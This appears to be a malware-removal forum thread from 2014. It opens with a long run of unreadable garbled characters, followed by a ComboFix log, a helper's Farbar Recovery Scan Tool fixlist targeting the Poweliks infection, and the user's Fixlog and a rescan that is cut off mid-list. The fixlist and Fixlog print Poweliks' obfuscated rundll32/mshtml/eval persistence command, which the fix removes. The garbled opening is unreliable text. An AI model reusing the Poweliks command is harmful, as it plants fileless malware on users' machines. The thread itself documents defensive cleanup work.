}23\FzR\]ZO3SH,+6A2\FzR\J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O JXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-dX12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k07rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7SH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH%\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+SH%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SH,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb%-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH%\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&dz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7S&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,ySXR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-JXO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kR\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\dX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX0\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&JzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O JXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SH,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb%-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH%\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\F"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-1GIo]`sI]#w&]M^U( ]Gp`s25x1*KZ2Tl`N5i`s?mpNj.M9-j!"W9!BfCo^Si2&T.Zw5}`sAji9Wt!9\mM1dI`99:39U.V.}pjs9i`.&"T.aDF}VwY"jB&]iDWHsw9lAVo]`1\jTjAi3D!".B.K`s&UjaB4y1jI82TP`.x5TVK4F96C(9L5j]xPT^WH:w9lV,J}`s}]ias^MgBmFslK`q!"j\"q.\l tsi`s&Uq1Gp.g!C(9L"joAjT9x[!D}ljV$]Z}\PixAj(9]Ij[;+AFA"Vw.IA9-lZ1G[2NA5TVgI ^-t.x\5HM}p9xiM8op0.$]As&ii9x8 w/mM1Np`s&`j4tIoV3p^VK]yV&Uis;jg!}L"(53]\iixfjjDrlq,o}j9f[igxi(g35([xKVV&5D#?A.$KoAu]VV\\TY$?jwot 9yd!3!jTXA}.wF}8s%]om!jT"W#C4K5.VS.VtIUj3Ijs$p:I%}qVA`i.dMXAPjwAgM[sjh9Ye ^GIZsB}qVr}""Y 3&T:jLHI Nf5j"XmoVhSZoX\A9|qo}s?V4U}jwA5x[k\+"/e l648wpn_1H8#I! Vw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA`2"]qNBp`s$}`sA5is~pj4iV^x:C^h]T^fJ!l/l`sU}`sA}iwA}jw$5s0IsVA9xa]qNBI:Apj`1A5is~pjw$}jwA5 3h#T^f}3l!l`sUn^9}tT^A}jw$5jo~p`sAUF4jqNBK:Apj`1M:V}ap9$}jwA5joA}iwA[K^!l`sG#w9}tT^L\s9B5!o~p`sA5jw$p`s35NApj`1q:V}ap^iiV^xUjoA}iwA}jw$p`s}\89}tT^D\s9B5!a}IsVA\!w$p`s$p`s$}`sq}iwap^iV^xUK)h#T^f}jw$p`s$}`sA}iAD\M8B5!X}IsVAmxajqNBp`s$}`sA5is~pj9}iF^xUKLh#T^fi3l!l`sU}`sA}iwA}jw$5tZ?sVAmF"jqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s!C^9}tTaX\s9B5!o~p`sAUV~jqNBp`s$}`ss5is~}!w$}jwA5&Lh#T^f}jw$p`sHt^9}tT^A}jw$5K#ZIsVA\!w$p`s$?.AOj`1A5is~pjg;iF^xUjoA}iwAi&"Fl`sU}`sA}ix&\M8B5!o~p`sAUaPqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw/?wwei0*k\s&6e39 U.so1qYk"F\/p`s$pjqz#NA.U3wyK~!CFaqU:aL\T8Aiy~ j8I.#0F1nV^Fi3j*:jo_1:Al"&4"KVFjmy9$}`sA"T5S5Lx.}.I6:(s5nV8*PM8jmy9$}^IK]p45i.\/U3aDj 1k5jw$p`}6HV1dPNALmT.~.L~dPFg.gjt}"jDe39fp`s$}0wk8sx/e Zq(M]wK V}j!lz.^tFm8s]}^1."i*:.3"][.aCCHA}iwA#V4 mwwoP Vl#TIh V\6(MHI.s6k(VxAjNfpqsp\qtlts}7534$[.aCCHA}iwAiKxG4w3z[wI3#"wr .4/9F2oj0Ntj&4dp`}/.ws }0wHmq9g.2w$}jws\Ma3]PwWe!4/4wwo Ak]q\n .1a(st2p^}.ts\Pj^jq.Z6Oi 1k5is~pjj6n.a("L$l##\FtM8d+qqzHoIl#"`hi8*9VVHmZsIj.xpjj}/?0Fjo.l"ft.pjw$}.jYj:XI\U4 eyx KwweCZsk\U4/P(aB9.2_+_1A5jw$j:qX?s9O8GAtjT}.5.4A82wC"M1A}iwA}j\UIs*fj`sAjpg&}?O$1x[xNbYl1Kg/1AsXK_V!}2IS}!NArs^+j.I6"32wCqAF}:OUI`Fe G9w6 wHnkDGI!o~p`s5(MOzNZV.I`FzijsS}isH+."+j g*IjAXep4ZjVzTrG}( _VIHo~Z}3kA:C[&}ZNn}2a1q."IZ2*PNpy9qAG?y4KjVx x(6[ 9A}jw$pjoTjAt;i/R\Jy931CoHlq9A\!w$mUYUp`s$}`s(5#.Np9$}K\I9!HA}ixC?DXIGN/iZYA8o^v6Dtg]"l`wj\3gBpjVdHUYH 05\9Ts5lCjH}3wA5V]H3&*J&99?ZI3jNA2jp~sP9(5Kt".A2!5.wJ+`.4Iwwhi`sw"PHMIf9C]kR!9fsf}fI!PXO%jVm+}`9A}igsn.A.U3t2I`sAUj&XS2N9KAt3jNAA}3tHp3^(CkR\}s$A] wZt:\2p01$}`swjf"vjjl(9ls.k`935vg/1u%*?as$}`pcuit&}fw$}jw95l3\[T4Xiy"}4s5.[A}xFT82[ `*5 ^MmZs3"M"\}A1VKVI/#063j3Y;1?R-J!w&5!X3]3wZt gVp^9$}`2 6/DZH?R*d!o~pZ9ct2jop`s/I.}*]ZqFd"tApjw$]f49`24ItpjvtXD%S8qT}N3\[T&h}FA.t!4AKAq 9F"zIAI}5^w-^y11(Tt$S&1*}jwAnyB?trDAtMI*p02-}Z6&Ho~x]f"}g2}.j`};j:931 wGIyNh[b,29Ts~}2w5}L\&`!]&n3XXjL"/rU,f}NA2 pgsP(g((!BG;%\9!w$1 N]j_IfioV?("9\I.wo}jwsIj(Dn3wZ}.w/HwoT[A5D}f\qCM"Ttso7NG3c5.~(lj5"my3a\.Iw\+W7j:\g}?rht&hw}p9:tm`.?8ihh29|ji&*j&9$`c]kn2v35k~}nvy]+`s%j_9z:it p3w+ 0yty]w\o4&Jy~e1VV/[.I?[%^M6jl3mM^.H.AfU46Sym.KqF+HH%\nfInKK4$Hsx:}K$sHu~sP(\I89h6As|tU9A}jw35L]~.0m 9&4Ol:A]+UYX As29Ts~HMj9]f"5}2]*jPws}Fw2I N(ijNw[f9*CKA"gMV.H2NxtsTTp0V}IZ9oC`w25%3X1:1.\Vx:n!aji 9Xnj"++ApTjqo\[rR\ fwq:sBslV.*I!^op`,.w5q\.Vc"us0SF&T}3wA5jos}iwA}jX/l`sU}`sA}VwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$K:!kFPD4#^;9f\H8FN&Z"-mG!ArHt8i2Vy9!.DSVxq8x"w(iEj l!t(x-mw1s^ }we+jyJ3841xHK5q6N}Lau}oI3}q6stys!\i}7m3\q8:g!m1Ei!Ow8x"smboGty2oC+jX8:jdty(!}V6/&s\2m Iq5q6}^s,!\ 1Z|?SGt 5o5Z44}U^!t.D[(U68#`VE[9tXp?X8jjs!NGHXo?X8.`V;NGHz 8FNnjbK!^;[s~!1VTwFj0wJ3^;Ns,.tUo3^/S6HLA"tkAS+GphdZ"-m;3{|wYPno1!\ !!jxj;[M^Y\?X98U"V^:OAjy.z[sVLtptEPwz1 444w!v}39sNAIs4V.UeoIV"h,HIxj;e&"w( Xp8+^E[Mjz|;tUeUAF^+jX\y&;\MakqA1t(MXplq*V42N}^s,L5j3k|M9V(2zWq!B*[!j4p.ZdZ9X[V.4p#Z/ FjB(x}.H^!/qFjB4 p"H^!d 8.9(Up.HVZ2(Z44UX!iu"Xp?02|U3;jq* 8+DVFZ"AdZ]SSGb/tZSA|:Y15ysTeytG6PY^+M^Tv#*#rin'C "EU`aQJ,kna,^+U-=lE~ZS8#I)mmYm4`b )8Im^Wdnv#iKXQpAA==^#~@.((((((((((((((((((((((((( Files Created from 2014-07-25 to 2014-08-25 )))))))))))))))))))))))))))))))..2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Rita\AppData\Local\temp2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Guest\AppData\Local\temp2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Default\AppData\Local\temp2014-08-23 20:54 . 2014-08-25 13:55 -------- d-----w- C:\FRST2014-08-23 20:30 . 2014-08-25 13:35 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys2014-08-23 20:30 . 2014-08-25 12:26 -------- d-----w- c:\program files\Malwarebytes Anti-Malware2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys2014-08-23 20:16 . 2014-08-25 15:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp2014-08-23 15:51 . 2014-08-23 15:53 -------- d-----w- C:\AdwCleaner2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys2014-08-20 22:08 . 2014-08-20 22:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG20142014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 22:19 . 2014-08-25 14:49 -------- d-----w- c:\program files\Glary Utilities 52014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch2014-08-12 22:03 . 2014-08-12 22:03 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 22:02 . 2014-08-22 20:10 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\42a4952014-08-12 21:58 . 2014-08-15 07:47 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\browser_dir2014-08-12 20:53 . 2014-08-23 01:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-12 20:51 . 2014-08-25 13:16 -------- d-----w- c:\programdata\IrfuqApivh2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll...(((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))).2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys..((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))..*Note* empty entries & legit default entries are not shown REGEDIT4.[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]"UINoteworthy"="c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll" [2014-08-20 325632].[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752].[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]"EnableLUA"= 0 (0x0)"EnableUIADesktopToggle"= 0 (0x0)"HideFastUserSwitching"= 0 (0x0).[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]"UseDefaultTile"= 0 (0x0).[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]BootExecute REG_MULTI_SZ autocheck autochk * \0BootDefrag.exe\0sasnative32.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]@="".[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]@="".S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]..[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12HPService REG_MULTI_SZ HPSLPSVChpdevmgmt REG_MULTI_SZ hpqcxs08 hpqddsvcLocalServiceAndNoImpersonation REG_MULTI_SZ FontCache.Contents of the 'Scheduled Tasks' folder.2014-08-25 c:\windows\Tasks\GlaryInitialize 5.job- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05].2014-08-25 c:\windows\Tasks\RtlNICDiagVistaStart.job- c:\program files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]..------- Supplementary Scan -------.uStart Page = hxxp://www.google.com/uInternet Settings,ProxyOverride = *.local;<local>TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3..**************************************************************************.catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.netRootkit scan 2014-08-25 11:08Windows 6.0.6002 Service Pack 2 NTFS.scanning hidden processes ... .scanning hidden autostart entries ... .scanning hidden files ... .scan completed successfullyhidden files: 0.**************************************************************************.--------------------- LOCKED REGISTRY KEYS ---------------------.[HKEY_USERS\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]@Allowed: (B 1 4 5 6) (S-1-5-5-0-383984).Completion time: 2014-08-25 11:10:46ComboFix-quarantined-files.txt 2014-08-25 15:10ComboFix2.txt 2014-08-24 19:45ComboFix3.txt 2014-08-23 20:16ComboFix4.txt 2014-08-23 18:22.Pre-Run: 238,789,816,320 bytes freePost-Run: 238,726,463,488 bytes free.- - End Of File - - D0071B68A17A82DBD63337816FF7894D5C616939100B85E558DA92B899A0FC36 Link to post Share on other sites More sharing options...
Naathim Posted August 25, 2014 ID:871102 Share Posted August 25, 2014 Still no joy I wonder if it's not a new modification.Anyway we need to kill Poweliks prior to other baddies, so I'm gonna focus on it now. Fix with Farbar Recovery Scan Tool This fix was created for this user for use on that particular machine. Running it on another one may cause damage and render the system unstable. Press the + R on your keyboard at the same time. Type Notepad and click OK.Copy the entire content of the codebox below and paste into the Notepad document:startHKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?endClick File, Save As and type fixlist.txt as the File Name.Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!Right-click on icon and select Run as Administrator to start the tool.> XP users click run after receipt of Windows Security Warning - Open File.> 8 users will be prompted about Windows SmartScreen protection - click More information and Run.Press the Fix button just once and wait.If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.When finished FRST will generate a log on the Desktop, called Fixlog.txt.Please include it in your reply. Scan with Farbar Recovery Scan ToolPlease re-run Farbar Recovery Scan Tool.Right-click on icon and select Run as Administrator to start the tool.> XP users click run after receipt of Windows Security Warning - Open File.> 8 users will be prompted about Windows SmartScreen protection - click More information and Run.Make sure that Addition option is checked.Press Scan button and wait.The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.Please include their content in your next reply. Link to post Share on other sites More sharing options...
jjoyner1985 Posted August 25, 2014 Author ID:871153 Share Posted August 25, 2014 Fixlog Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version:23-08-2014Ran by savas.kyriakidis at 2014-08-25 13:39:24 Run:1Running from F:\Boot Mode: Normal ============================================== Content of fixlist:*****************startHKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?end***************** "HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully."HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully."HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found. ==== End of Fixlog ==== FRST Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 25-08-2014 13:41:21Running from F:\Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) OS Language: English (United States)Internet Explorer Version 9Boot Mode: Normal The only official download link for FRST:Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ Download link from any site other than Bleeping Computer is unpermitted or outdated.See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Microsoft Corporation) C:\Windows\System32\SLsvc.exe(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe(Microsoft Corporation) C:\Windows\System32\wlanext.exe(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE( ) C:\Windows\System32\lxblcoms.exe() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe(Hewlett-Packard) C:\Program Files\HP\HP Software 